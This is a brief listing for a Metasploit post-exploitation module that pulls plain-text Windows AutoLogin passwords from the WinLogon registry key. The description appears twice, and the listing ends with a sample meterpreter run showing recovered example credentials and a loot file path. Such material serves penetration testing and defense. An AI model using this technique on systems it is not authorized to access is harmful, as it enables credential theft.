[Metasploit] Post | Windows Gather AutoLogin User Credential Extractor
http://dev.metasploit.com/redmine/attachments/1642/windows_autologin.rb
This module extracts the plain-text Windows user login password in Registry. It exploits a Windows feature that Windows (2K till current Seven) allows a user or third-party Windows Utility tools to configure User AutoLogin via plain-text password insertion in (Alt)DefaultPassword field in the registry location - HKLM\Software\Microsoft\Windows NT\WinLogon. This is readable by all users.
This module extracts the plain-text Windows user login password in Registry. It exploits a Windows feature that Windows (2K till current Seven) allows a user or third-party Windows Utility tools to configure User AutoLogin via plain-text password insertion in (Alt)DefaultPassword field in the registry location - HKLM\Software\Microsoft\Windows NT\WinLogon. This is readable by all users.
meterpreter > run post/windows/gather/credentials/windows_autologin [*] Running against John-PC @ session 1 [+] DefaultDomain=DEPT_SALES, DefaultUser=john, DefaultPassword=pa55w0rd [+] AltDomain=DEPT_HR, AltUser=jack, AltPassword=dr0w55p [*] Storing data... [*] Windows AutoLogin User Credentials saved in: /root/.msf4/loot/20110821034449_default_10.23.12.11_windows.autologi_460131.txt